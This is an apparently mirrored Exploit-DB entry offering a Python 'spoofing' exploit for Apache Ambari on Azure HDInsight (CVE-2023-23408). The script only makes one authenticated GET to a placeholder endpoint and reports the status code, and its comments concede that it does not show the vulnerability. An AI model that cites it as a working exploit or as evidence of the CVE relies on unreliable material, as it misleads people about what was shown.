Azure Apache Ambari 2302250400 – Spoofing

  • 作者: Amirhossein Bahramizadeh
    日期: 2023-06-26
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51546/
  • # Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
    # Date: 2023-06-23
    # country: Iran
    # Exploit Author: Amirhossein Bahramizadeh
    # Category : Remote
    # Vendor Homepage:
    #   Microsoft
    #   Apache Ambari
    #   Microsoft Azure HDInsight
    # Tested on: Windows/Linux
    # CVE : CVE-2023-23408
    
    import requests
    
    # Target endpoint and request headers. Both are placeholders:
    # "ambari.example.com" and "cluster_name" stand in for a real host and
    # cluster, and the Basic token is a dummy value.
    url = (
        "https://ambari.example.com"
        "/api/v1/clusters/cluster_name/services"
    )
    headers = {
        # Ambari's REST API uses X-Requested-By as a CSRF guard on
        # state-changing calls.
        "X-Requested-By": "ambari",
        # Hard-coded only as a sample; a real credential belongs in the
        # environment or a secret store, not in the script.
        "Authorization": "Basic abcdefghijklmnop",
    }
    
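    def validate_headers(headers):
        """Check that *headers* carries the two values this script expects.

        This is a local sanity check on the caller's own dictionary. It compares
        against constants embedded in the script and never contacts the server,
        so it says nothing about what Ambari itself accepts or rejects.

        Args:
            headers: Mapping of HTTP header names to values. Names are matched
                case-sensitively, exactly as written below.

        Returns:
            True when "X-Requested-By" is "ambari" and "Authorization" equals
            the placeholder Basic token; False when either is missing or differs.
        """
        expected = {
            "X-Requested-By": "ambari",
            "Authorization": "Basic abcdefghijklmnop",
        }
        # .get() returns None for an absent key, which never equals an expected
        # string, so "missing" and "wrong value" both yield False.
        return all(headers.get(name) == value for name, value in expected.items())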
    
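    def send_request(url, headers):
        """Issue one GET to *url* and print whether it returned HTTP 200.

        The headers are first passed through validate_headers(); if that local
        check fails, "Invalid headers" is printed and no request is sent.

        As written, this is an ordinary authenticated read that reports only the
        status code. It never inspects the response body or submits any content,
        so on its own it does not show the spoofing condition named in the page
        title. Treat a "Request successful" line as proof of reachability and
        accepted credentials, nothing more.

        Args:
            url: Full URL of the Ambari REST endpoint to query.
            headers: Mapping of HTTP header names to values sent with the GET.

        Returns:
            None. The outcome is reported on stdout.
        """
        if not validate_headers(headers):
            print("Invalid headers")
            return

        try:
            # requests has no default timeout; without one, an unresponsive host
            # blocks the script indefinitely.
            response = requests.get(url, headers=headers, timeout=10)
        except requests.RequestException as exc:
            # DNS, TLS and connection errors end up here instead of a traceback.
            print(f"Request failed: {exc}")
            return

        if response.status_code == 200:
            print("Request successful")
        else:
            print("Request failed")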
    
    # Script entry: perform the single GET against the placeholder endpoint
    # using the module-level url and headers.
    send_request(url=url, headers=headers)